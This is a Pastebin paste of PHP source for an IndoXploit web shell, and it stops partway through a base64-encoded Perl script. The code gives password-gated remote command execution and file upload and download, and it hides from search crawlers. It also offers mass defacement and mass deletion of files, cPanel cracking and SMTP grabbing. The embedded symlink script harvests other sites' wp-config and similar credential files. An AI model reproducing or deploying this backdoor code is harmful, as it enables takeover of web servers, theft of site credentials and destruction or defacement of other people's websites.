Guest User

diki13

a guest
Aug 18th, 2018
260
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "5eceafb0954cada7e99d6f3063f56fdf"; // default: IndoXploit
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <title>[!] Selamat Datang [!]</title>
  31. <style type="text/css">
  32. html {
  33. margin: 20px auto;
  34. background: #000000;
  35. color: green;
  36. text-align: center;
  37. }
  38. header {
  39. color: green;
  40. margin: 10px auto;
  41. }
  42. input[type=password] {
  43. width: 250px;
  44. height: 25px;
  45. color: red;
  46. background: #000000;
  47. border: 1px dotted green;
  48. padding: 5px;
  49. margin-left: 20px;
  50. text-align: center;
  51. }
  52. </style>
  53. </head>
  54. <center>
  55. <header>
  56. <pre>
  57. <img src="http://imageupload.co.uk/images/2018/04/14/IMG-20180414-WA0021.jpg" height="250">
  58. _____ _ _ _____ _ _ _____
  59. | __ \ (_) | / ____| (_) | / ____|
  60. | | | | _____ ___| | | (___ ___ ___ _ _ _ __ _| |_ _ _ | | _ __ _____ __
  61. | | | |/ _ \ \ / / | | \___ \ / _ \/ __| | | | '__| | __| | | | | | | '__/ _ \ \ /\ / /
  62. | |__| | __/\ V /| | | ____) | __/ (__| |_| | | | | |_| |_| | | |____| | | __/\ V V /
  63. |_____/ \___| \_/ |_|_| |_____/ \___|\___|\__,_|_| |_|\__|\__, | \_____|_| \___| \_/\_/
  64. __/ |
  65. |___/
  66.  
  67. </pre>
  68. </header>
  69. <form method="post">
  70. <input type="password" name="pass">
  71. </form>
  72. <?php
  73. exit;
  74. }
  75. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  76. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  77. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  78. else
  79. login_shell();
  80. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  81. @ob_clean();
  82. $file = $_GET['file'];
  83. header('Content-Description: File Transfer');
  84. header('Content-Type: application/octet-stream');
  85. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  86. header('Expires: 0');
  87. header('Cache-Control: must-revalidate');
  88. header('Pragma: public');
  89. header('Content-Length: ' . filesize($file));
  90. readfile($file);
  91. exit;
  92. }
  93. ?>
  94. <html>
  95. <head>
  96. <title>[!] DSC SH3LL [!]</title>
  97. <meta name='author' content='IndoXploit'>
  98. <meta charset="UTF-8">
  99. <style type='text/css'>
  100. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  101. html {
  102. background: #000000;
  103. color: #ffffff;
  104. font-family: 'Ubuntu';
  105. font-size: 13px;
  106. width: 100%;
  107. }
  108. li {
  109. display: inline;
  110. margin: 5px;
  111. padding: 5px;
  112. }
  113. table, th, td {
  114. border-collapse:collapse;
  115. font-family: Tahoma, Geneva, sans-serif;
  116. background: transparent;
  117. font-family: 'Ubuntu';
  118. font-size: 13px;
  119. }
  120. .table_home, .th_home, .td_home {
  121. border: 1px solid #ffffff;
  122. }
  123. th {
  124. padding: 10px;
  125. }
  126. a {
  127. color: #ffffff;
  128. text-decoration: none;
  129. }
  130. a:hover {
  131. color: gold;
  132. text-decoration: underline;
  133. }
  134. b {
  135. color: gold;
  136. }
  137. input[type=text], input[type=password],input[type=submit] {
  138. background: transparent;
  139. color: #ffffff;
  140. border: 1px solid #ffffff;
  141. margin: 5px auto;
  142. padding-left: 5px;
  143. font-family: 'Ubuntu';
  144. font-size: 13px;
  145. }
  146. textarea {
  147. border: 1px solid #ffffff;
  148. width: 100%;
  149. height: 400px;
  150. padding-left: 5px;
  151. margin: 10px auto;
  152. resize: none;
  153. background: transparent;
  154. color: #ffffff;
  155. font-family: 'Ubuntu';
  156. font-size: 13px;
  157. }
  158. select {
  159. width: 152px;
  160. background: #000000;
  161. color: lime;
  162. border: 1px solid #ffffff;
  163. margin: 5px auto;
  164. padding-left: 5px;
  165. font-family: 'Ubuntu';
  166. font-size: 13px;
  167. }
  168. option:hover {
  169. background: lime;
  170. color: #000000;
  171. }
  172. </style>
  173. </head>
  174. <?php
  175. ###############################################################################
  176. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
  177. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
  178. // Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
  179. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
  180. // Greetz: All Member IndoXploit. & all my friends.
  181. ###############################################################################
  182. function w($dir,$perm) {
  183. if(!is_writable($dir)) {
  184. return "<font color=red>".$perm."</font>";
  185. } else {
  186. return "<font color=lime>".$perm."</font>";
  187. }
  188. }
  189. function r($dir,$perm) {
  190. if(!is_readable($dir)) {
  191. return "<font color=red>".$perm."</font>";
  192. } else {
  193. return "<font color=lime>".$perm."</font>";
  194. }
  195. }
  196. function exe($cmd) {
  197. if(function_exists('system')) {
  198. @ob_start();
  199. @system($cmd);
  200. $buff = @ob_get_contents();
  201. @ob_end_clean();
  202. return $buff;
  203. } elseif(function_exists('exec')) {
  204. @exec($cmd,$results);
  205. $buff = "";
  206. foreach($results as $result) {
  207. $buff .= $result;
  208. } return $buff;
  209. } elseif(function_exists('passthru')) {
  210. @ob_start();
  211. @passthru($cmd);
  212. $buff = @ob_get_contents();
  213. @ob_end_clean();
  214. return $buff;
  215. } elseif(function_exists('shell_exec')) {
  216. $buff = @shell_exec($cmd);
  217. return $buff;
  218. }
  219. }
  220. function perms($file){
  221. $perms = fileperms($file);
  222. if (($perms & 0xC000) == 0xC000) {
  223. // Socket
  224. $info = 's';
  225. } elseif (($perms & 0xA000) == 0xA000) {
  226. // Symbolic Link
  227. $info = 'l';
  228. } elseif (($perms & 0x8000) == 0x8000) {
  229. // Regular
  230. $info = '-';
  231. } elseif (($perms & 0x6000) == 0x6000) {
  232. // Block special
  233. $info = 'b';
  234. } elseif (($perms & 0x4000) == 0x4000) {
  235. // Directory
  236. $info = 'd';
  237. } elseif (($perms & 0x2000) == 0x2000) {
  238. // Character special
  239. $info = 'c';
  240. } elseif (($perms & 0x1000) == 0x1000) {
  241. // FIFO pipe
  242. $info = 'p';
  243. } else {
  244. // Unknown
  245. $info = 'u';
  246. }
  247. // Owner
  248. $info .= (($perms & 0x0100) ? 'r' : '-');
  249. $info .= (($perms & 0x0080) ? 'w' : '-');
  250. $info .= (($perms & 0x0040) ?
  251. (($perms & 0x0800) ? 's' : 'x' ) :
  252. (($perms & 0x0800) ? 'S' : '-'));
  253. // Group
  254. $info .= (($perms & 0x0020) ? 'r' : '-');
  255. $info .= (($perms & 0x0010) ? 'w' : '-');
  256. $info .= (($perms & 0x0008) ?
  257. (($perms & 0x0400) ? 's' : 'x' ) :
  258. (($perms & 0x0400) ? 'S' : '-'));
  259. // World
  260. $info .= (($perms & 0x0004) ? 'r' : '-');
  261. $info .= (($perms & 0x0002) ? 'w' : '-');
  262. $info .= (($perms & 0x0001) ?
  263. (($perms & 0x0200) ? 't' : 'x' ) :
  264. (($perms & 0x0200) ? 'T' : '-'));
  265. return $info;
  266. }
  267. function hdd($s) {
  268. if($s >= 1073741824)
  269. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  270. elseif($s >= 1048576)
  271. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  272. elseif($s >= 1024)
  273. return sprintf('%1.2f',$s / 1024 ) .' KB';
  274. else
  275. return $s .' B';
  276. }
  277. function ambilKata($param, $kata1, $kata2){
  278. if(strpos($param, $kata1) === FALSE) return FALSE;
  279. if(strpos($param, $kata2) === FALSE) return FALSE;
  280. $start = strpos($param, $kata1) + strlen($kata1);
  281. $end = strpos($param, $kata2, $start);
  282. $return = substr($param, $start, $end - $start);
  283. return $return;
  284. }
  285. function getsource($url) {
  286. $curl = curl_init($url);
  287. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  288. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  289. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  290. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  291. $content = curl_exec($curl);
  292. curl_close($curl);
  293. return $content;
  294. }
  295. function bing($dork) {
  296. $npage = 1;
  297. $npages = 30000;
  298. $allLinks = array();
  299. $lll = array();
  300. while($npage <= $npages) {
  301. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  302. if($x) {
  303. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  304. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  305. $npage = $npage + 10;
  306. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  307. } else break;
  308. }
  309. $URLs = array();
  310. foreach($allLinks as $url){
  311. $exp = explode("/", $url);
  312. $URLs[] = $exp[2];
  313. }
  314. $array = array_filter($URLs);
  315. $array = array_unique($array);
  316. $sss = count(array_unique($array));
  317. foreach($array as $domain) {
  318. echo $domain."\n";
  319. }
  320. }
  321. function reverse($url) {
  322. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  323. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  324. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  325. curl_setopt($ch, CURLOPT_HEADER, 0);
  326. curl_setopt($ch, CURLOPT_POST, 1);
  327. $resp = curl_exec($ch);
  328. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  329. $array = explode(",,", $resp);
  330. unset($array[0]);
  331. foreach($array as $lnk) {
  332. $lnk = "http://$lnk";
  333. $lnk = str_replace(",", "", $lnk);
  334. echo $lnk."\n";
  335. ob_flush();
  336. flush();
  337. }
  338. curl_close($ch);
  339. }
  340. if(get_magic_quotes_gpc()) {
  341. function idx_ss($array) {
  342. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  343. }
  344. $_POST = idx_ss($_POST);
  345. $_COOKIE = idx_ss($_COOKIE);
  346. }
  347.  
  348. if(isset($_GET['dir'])) {
  349. $dir = $_GET['dir'];
  350. chdir($dir);
  351. } else {
  352. $dir = getcwd();
  353. }
  354. $kernel = php_uname();
  355. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  356. $dir = str_replace("\\","/",$dir);
  357. $scdir = explode("/", $dir);
  358. $freespace = hdd(disk_free_space("/"));
  359. $total = hdd(disk_total_space("/"));
  360. $used = $total - $freespace;
  361. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  362. $ds = @ini_get("disable_functions");
  363. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  364. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  365. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  366. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  367. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  368. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  369. if(!function_exists('posix_getegid')) {
  370. $user = @get_current_user();
  371. $uid = @getmyuid();
  372. $gid = @getmygid();
  373. $group = "?";
  374. } else {
  375. $uid = @posix_getpwuid(posix_geteuid());
  376. $gid = @posix_getgrgid(posix_getegid());
  377. $user = $uid['name'];
  378. $uid = $uid['uid'];
  379. $group = $gid['name'];
  380. $gid = $gid['gid'];
  381. }
  382. echo "System: <font color=lime>".$kernel."</font><br>";
  383. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  384. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  385. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  386. echo "Safe Mode: $sm<br>";
  387. echo "Disable Functions: $show_ds<br>";
  388. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  389. echo "Current DIR: ";
  390. foreach($scdir as $c_dir => $cdir) {
  391. echo "<a href='?dir=";
  392. for($i = 0; $i <= $c_dir; $i++) {
  393. echo $scdir[$i];
  394. if($i != $c_dir) {
  395. echo "/";
  396. }
  397. }
  398. echo "'>$cdir</a>/";
  399. }
  400. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  401. echo "<hr>";
  402. echo "<center>";
  403. echo "<ul>";
  404. echo "<li>[ <a href='?'>Home</a> ]</li>";
  405. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  406. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  407. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  408. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  409. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  410. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  411. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  412. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  413. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  414. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
  415. echo "<li>[ <a href='?dir=$dir&do=network'>network</a> ]</li>";
  416. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li><br>";
  417. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  418. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  419. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  420. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  421. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  422. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  423. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
  424. echo "<li>[ <a style='color: red;' href='?logout=true'>Logout</a> ]</li>";
  425. echo "</ul>";
  426. echo "</center>";
  427. echo "<hr>";
  428. if($_GET['logout'] == true) {
  429. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  430. echo "<script>window.location='?';</script>";
  431. } elseif($_GET['do'] == 'upload') {
  432. echo "<center>";
  433. if($_POST['upload']) {
  434. if($_POST['tipe_upload'] == 'biasa') {
  435. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  436. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  437. } else {
  438. $act = "<font color=red>failed to upload file</font>";
  439. }
  440. } else {
  441. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  442. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  443. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  444. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  445. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  446. } else {
  447. $act = "<font color=red>failed to upload file</font>";
  448. }
  449. } else {
  450. $act = "<font color=red>failed to upload file</font>";
  451. }
  452. }
  453. }
  454. echo "Upload File:
  455. <form method='post' enctype='multipart/form-data'>
  456. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  457. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  458. <input type='file' name='ix_file'>
  459. <input type='submit' value='upload' name='upload'>
  460. </form>";
  461. echo $act;
  462. echo "</center>";
  463. } elseif($_GET['do'] == 'cmd') {
  464. echo "<form method='post'>
  465. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  466. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  467. </form>";
  468. if($_POST['do_cmd']) {
  469. echo "<pre>".exe($_POST['cmd'])."</pre>";
  470. }
  471. } elseif($_GET['do'] == 'mass_deface') {
  472. function sabun_massal($dir,$namafile,$isi_script) {
  473. if(is_writable($dir)) {
  474. $dira = scandir($dir);
  475. foreach($dira as $dirb) {
  476. $dirc = "$dir/$dirb";
  477. $lokasi = $dirc.'/'.$namafile;
  478. if($dirb === '.') {
  479. file_put_contents($lokasi, $isi_script);
  480. } elseif($dirb === '..') {
  481. file_put_contents($lokasi, $isi_script);
  482. } else {
  483. if(is_dir($dirc)) {
  484. if(is_writable($dirc)) {
  485. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  486. file_put_contents($lokasi, $isi_script);
  487. $idx = sabun_massal($dirc,$namafile,$isi_script);
  488. }
  489. }
  490. }
  491. }
  492. }
  493. }
  494. function sabun_biasa($dir,$namafile,$isi_script) {
  495. if(is_writable($dir)) {
  496. $dira = scandir($dir);
  497. foreach($dira as $dirb) {
  498. $dirc = "$dir/$dirb";
  499. $lokasi = $dirc.'/'.$namafile;
  500. if($dirb === '.') {
  501. file_put_contents($lokasi, $isi_script);
  502. } elseif($dirb === '..') {
  503. file_put_contents($lokasi, $isi_script);
  504. } else {
  505. if(is_dir($dirc)) {
  506. if(is_writable($dirc)) {
  507. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  508. file_put_contents($lokasi, $isi_script);
  509. }
  510. }
  511. }
  512. }
  513. }
  514. }
  515. if($_POST['start']) {
  516. if($_POST['tipe_sabun'] == 'mahal') {
  517. echo "<div style='margin: 5px auto; padding: 5px'>";
  518. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  519. echo "</div>";
  520. } elseif($_POST['tipe_sabun'] == 'murah') {
  521. echo "<div style='margin: 5px auto; padding: 5px'>";
  522. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  523. echo "</div>";
  524. }
  525. } else {
  526. echo "<center>";
  527. echo "<form method='post'>
  528. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  529. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  530. <font style='text-decoration: underline;'>Folder:</font><br>
  531. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  532. <font style='text-decoration: underline;'>Filename:</font><br>
  533. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  534. <font style='text-decoration: underline;'>Index File:</font><br>
  535. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
  536. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  537. </form></center>";
  538. }
  539. } elseif($_GET['do'] == 'mass_delete') {
  540. function hapus_massal($dir,$namafile) {
  541. if(is_writable($dir)) {
  542. $dira = scandir($dir);
  543. foreach($dira as $dirb) {
  544. $dirc = "$dir/$dirb";
  545. $lokasi = $dirc.'/'.$namafile;
  546. if($dirb === '.') {
  547. if(file_exists("$dir/$namafile")) {
  548. unlink("$dir/$namafile");
  549. }
  550. } elseif($dirb === '..') {
  551. if(file_exists("".dirname($dir)."/$namafile")) {
  552. unlink("".dirname($dir)."/$namafile");
  553. }
  554. } else {
  555. if(is_dir($dirc)) {
  556. if(is_writable($dirc)) {
  557. if(file_exists($lokasi)) {
  558. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  559. unlink($lokasi);
  560. $idx = hapus_massal($dirc,$namafile);
  561. }
  562. }
  563. }
  564. }
  565. }
  566. }
  567. }
  568. if($_POST['start']) {
  569. echo "<div style='margin: 5px auto; padding: 5px'>";
  570. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  571. echo "</div>";
  572. } else {
  573. echo "<center>";
  574. echo "<form method='post'>
  575. <font style='text-decoration: underline;'>Folder:</font><br>
  576. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  577. <font style='text-decoration: underline;'>Filename:</font><br>
  578. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  579. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  580. </form></center>";
  581. }
  582. } elseif($_GET['do'] == 'config') {
  583. $idx = mkdir("idx_config", 0777);
  584. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
  585. $htc = fopen("idx_config/.htaccess","w");
  586. fwrite($htc, $isi_htc);
  587. fclose($htc);
  588. if(preg_match("/vhosts|vhost/", $dir)) {
  589. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  590. $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvb